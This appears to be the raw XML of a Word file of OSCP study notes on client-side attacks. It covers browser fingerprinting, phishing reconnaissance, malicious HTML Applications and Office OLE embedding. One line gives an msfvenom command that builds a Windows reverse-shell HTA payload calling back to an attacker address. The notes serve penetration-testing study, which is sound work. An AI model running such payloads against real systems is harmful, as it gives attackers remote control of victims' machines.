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E7" w:rsidRPr="001D6EF4" w:rsidRDefault="001D6EF4" w:rsidP="001D6EF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001D6EF4">
        <w:t xml:space="preserve">Client-side attack vectors are especially insidious as they exploit </w:t>
      </w:r>
      <w:r w:rsidRPr="001D6EF4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>weaknesses in client software</w:t>
      </w:r>
      <w:r w:rsidRPr="001D6EF4">
        <w:t>, such as a browser, as opposed to exploiting server software.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r w:rsidRPr="001D6EF4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>human interaction</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D6EF4" w:rsidRDefault="001D6EF4" w:rsidP="001D6EF4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="001D6EF4">
        <w:t>Passive Client Information Gathering</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D6EF4" w:rsidRDefault="001D6EF4" w:rsidP="001D6EF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You need to figure out the underlying OS and client software version. For Example – Windows 7 and Mozilla Firefox 48.01 by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>googling</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and stuff.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D6EF4" w:rsidRDefault="001D6EF4" w:rsidP="001D6EF4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="001D6EF4">
        <w:t>Active Client Information Gathering</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D6EF4" w:rsidRDefault="001D6EF4" w:rsidP="001D6EF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001D6EF4">
        <w:t xml:space="preserve">By contrast, active client information gathering techniques make direct contact with the target machine or its users. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D6EF4" w:rsidRDefault="001D6EF4" w:rsidP="001D6EF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001D6EF4">
        <w:t>This could involve placing a phone call to a user in an attempt to extract useful information or sending a targeted email to the victim hoping for a click on a link that will enumerate the target’s operating system version, browser version, and installed extensions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D6EF4" w:rsidRDefault="001D6EF4" w:rsidP="001D6EF4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="001D6EF4">
        <w:t>Social Engineering and Client-Side Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D6EF4" w:rsidRDefault="00F90B94" w:rsidP="001D6EF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Browser fingerprint can be used. </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00C043B5">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/Valve/fingerprintjs2/archive/mas ter.zip</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00F90B94" w:rsidRDefault="00F90B94" w:rsidP="001D6EF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId6" w:anchor="parse-useragent" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://developers.whatismybrowser.com/useragents/parse/#parse-useragent</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> website to tell the exact version of OS and </w:t>
      </w:r>
      <w:r w:rsidR="006F4A1D">
        <w:t>browser</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F90B94" w:rsidRDefault="006F4A1D" w:rsidP="006F4A1D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="006F4A1D">
        <w:t>Leveraging HTML Applications</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F4A1D" w:rsidRDefault="00150201" w:rsidP="006F4A1D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00150201">
        <w:t>If a file is created with the extension of .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00150201">
        <w:t>hta</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00150201">
        <w:t xml:space="preserve"> instead of .html, Internet Explorer will automatically interpret it as a HTML Application and offer the ability to execute it using the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C422CF">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>mshta.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00150201">
        <w:t xml:space="preserve"> program.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C02FDD" w:rsidRDefault="00C02FDD" w:rsidP="006F4A1D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C02FDD">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C02FDD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C02FDD">
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C02FDD">
        <w:t xml:space="preserve"> -p windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C02FDD">
        <w:t>shell_reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C02FDD">
        <w:t xml:space="preserve"> LHOST=10.11.0.4 LPORT=4444 -f </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C02FDD">
        <w:t>hta-psh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C02FDD">
        <w:t xml:space="preserve"> -o /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C02FDD">
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C02FDD">
        <w:t>/www/html/evil.hta</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C02FDD" w:rsidRDefault="00C02FDD" w:rsidP="00C02FDD">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00C02FDD">
        <w:t>Exploiting Microsoft Office</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C02FDD" w:rsidRDefault="00C02FDD" w:rsidP="00C02FDD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00C02FDD">
        <w:t>Microsoft Word Macro</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C02FDD" w:rsidRDefault="002122E7" w:rsidP="00C02FDD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Read docs OSCP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002122E7" w:rsidRDefault="002122E7" w:rsidP="002122E7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="002122E7">
        <w:t>Object Linking and Embedding</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002122E7" w:rsidRDefault="002122E7" w:rsidP="002122E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002122E7">
        <w:t>Another popular client-side attack against Microsoft Office abuses</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Dynamic Data Exchange (DDE) </w:t>
      </w:r>
      <w:r w:rsidRPr="002122E7">
        <w:t>to execute arbitrary applications f</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">rom within Office documents, </w:t>
      </w:r>
      <w:r w:rsidRPr="002122E7">
        <w:t>but this has been patched since December of 2017</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002122E7" w:rsidRDefault="002122E7" w:rsidP="002122E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002122E7">
        <w:t>However, we can still leverage Object Linking and Embedding (OLE) to abuse Microsoft Office’s document-embedding feature.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002122E7" w:rsidRPr="002122E7" w:rsidRDefault="002122E7" w:rsidP="002122E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002122E7">
        <w:t>In this attack scenario, we are going t</w:t>
      </w:r>
      <w:r w:rsidR="00B9671F">
        <w:t xml:space="preserve">o embed a Windows batch file </w:t>
      </w:r>
      <w:r w:rsidRPr="002122E7">
        <w:t>inside a Microsoft Word document.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="002122E7" w:rsidRPr="00212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3279"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FCB2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808D8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="46D4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6697B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="615E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73195"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A63C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6EF4"/>
    <w:rsid w:val="00150201"/>
    <w:rsid w:val="001D6EF4"/>
    <w:rsid w:val="002122E7"/>
    <w:rsid w:val="00367710"/>
    <w:rsid w:val="003A088D"/>
    <w:rsid w:val="006F4A1D"/>
    <w:rsid w:val="00B9671F"/>
    <w:rsid w:val="00C02FDD"/>
    <w:rsid w:val="00C422CF"/>
    <w:rsid w:val="00F9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0B9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2F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hatismybrowser.com/useragents/parse/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Valve/fingerprintjs2/archive/mas%20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2020-05-01T12:06:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-05-01T16:40:00Z</dcterms:modified>
</cp:coreProperties>
</file>